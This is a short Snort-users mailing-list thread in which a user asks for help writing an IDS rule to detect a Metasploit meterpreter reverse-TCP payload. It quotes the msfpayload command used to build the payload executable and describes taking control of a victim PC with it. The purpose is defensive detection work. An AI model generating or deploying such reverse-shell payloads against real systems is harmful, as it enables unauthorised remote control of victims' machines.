[Snort-users] how to write rule for msfpayload in linux
nguyenblack1995 at gmail.com
Sat Nov 18 20:31:26 EST 2017
On the attacker I use: msfpayload windows/meterpreter/reverse_tcp
LPORT=4444 X > /root/Desktop/payload.exe ( in order to create file
When I run file payload.exe on PC victim , I will take control system of
victim. I run wireshark and match packet but I do not know where to start
in order to write rule for type this attack
2017-11-19 2:16 GMT+07:00 DFIRob <rd.seclists at gmail.com>:
> Hi, do you have a pcap that you want to alert on?
> On Sat, Nov 18, 2017 at 3:22 PM, nguyen cao via Snort-users <
> snort-users at lists.snort.org> wrote:
>> who can help me about write rule for msfpayload in linux ?
>> creat payload by msfpayload : msfpayload windows/meterpreter/reverse_tcp
>> LHOST=/ / LPORT=/ /....
>> Snort-users mailing list
>> Snort-users at lists.snort.org
>> Go to this URL to change user options or unsubscribe:
>> Please visit http://blog.snort.org to stay current on all the latest
>> Snort news!
>> Please follow these rules: https://snort.org/faq/what-is-
-------------- next part --------------
An HTML attachment was scrubbed...
More information about the Snort-users